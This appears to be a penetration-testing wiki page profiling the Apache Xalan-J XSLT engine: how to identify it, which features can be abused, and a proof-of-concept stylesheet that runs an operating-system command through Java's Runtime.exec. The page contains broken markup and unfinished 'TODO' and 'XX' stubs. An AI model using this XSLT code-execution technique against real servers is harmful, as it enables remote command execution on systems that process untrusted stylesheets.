Engine_XalanJ
Xalan-J is a Java based XSLT engine by the Apache Project.
Supported version
1.0
Command line
$> java org.apache.xalan.xslt.Process -in foo.xml -xsl foo.xsl
Note : xml-apis.jar, xercesImpl.jar and xalan*.jar must be in the $CLASSPATH
Identification strings
xsl:vendor-url | http://xml.apache.org/xalan-j |
---|---|
xsl:vendor | Apache Software Foundation |
xsl:version | 1.0 |
Special features
- File creation
- Code execution
- JDBC connectivity
- Java properties disclosure
- Java environment disclosure
Java environment disclosure
The checkEnvironment() extension function (documented here), associated to the Xalan namespace, will display some information about the execution context (packages, paths, versions, ...). The output of the execution of is .
|=Namespace|=Extension function|=PoC|=Sample output
|http:~/~/xml.apache.org/xalan/java/java.util.Date|new|[[xalanj-java-date.xsl>>attach:xalanj-java-date.xsl]]|[[xalanj-java-date-output.txt>>
XX
Java code execution
The following code will display the current date :
TODO
Execution of external commands
The following code will execute the command "touch /tmp/hello" :
<?xml version="1.0"?>
<xsl:stylesheet xmlns:xsl="http://www.w3.org/1999/XSL/Transform"
xmlns:j="http://xml.apache.org/xalan/java"
exclude-result-prefixes="j"
version="1.0">
<xsl:template match="/">
<xsl:variable name="c"><![CDATA[touch = /tmp/hello]]></xsl:variable>
<xsl:variable name="a" select="j:split($c, ' = ')"/>
<xsl:variable name="r" select="j:java.lang.Runtime.getRuntime()"/>
<xsl:variable name="p" select="j:exec($r, $a )"/>
No content at the moment ...
</xsl:template>
</xsl:stylesheet>